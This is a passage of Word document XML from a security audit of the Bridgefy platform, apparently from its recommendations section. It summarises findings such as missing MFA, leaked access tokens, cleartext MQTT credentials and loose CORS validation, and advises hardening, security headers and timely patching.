        </w:rPr>
        <w:t>had</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with a combination of missing Multi-Factor-Authentication (MFA, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), usage of easy-to-guess passwords, in combination with missing account lockout and rate limiting features, and sensitive services being exposed to the internet, all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of which led to EMQX Admin Access (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). It is recommended to deploy MFA, implement an adequate password policy, implement an account lockout feature, throttle clients when they make too many requests within a given timeframe, and reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>internet-reachable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>minimum possible for the solution to operate. This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>significantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>increase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>difficulty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to abuse a number of functional areas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Avoidance of Token Leaks, Storage &amp; Error Handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: The EMQX admin access obtained in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, could be escalated to full MongoDB Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>due</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>being</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leaked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>responses (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In turn, the MongoDB Admin access results in instant takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy user via the MQTT credentials that are stored in clear-text within this database (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Other possible improvements include information disclosure via server responses and error messages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). It is important to reduce the amount of information saved and revealed by the server to the minimum possible necessary for the application to work. The reason for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>redundant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>returned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could be abused by malicious adversaries to fine-tune attacks against the platform or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>its users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hardening of Modern Browser Security Features: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The platform would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>benefit from tightening the implementation of a number of modern web technologies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>such as implementing whitelist validation for CORS origins, which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>resulted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>full impersonation of SDK users (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), as well as leveraging HTTP Security Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-042</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>implementing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(CSP) (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-041</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). An adequate implementation of these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reduce the potential for XSS and other client-side attacks, hence protecting users in edge-case scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users better by hardening the current authentication (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) and session management (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-006</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Software Patching: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Bridgefy solution should implement appropriate software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>patching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>procedures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>regularly apply security patches in a timely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>manner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-002</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). In a day and age when most lines of code come from underlying software dependencies, regularly patching these becomes increasingly important to avoid unwanted security vulnerabilities. Possible automation for this could include tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Snyk.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>190</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Renovate Bot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
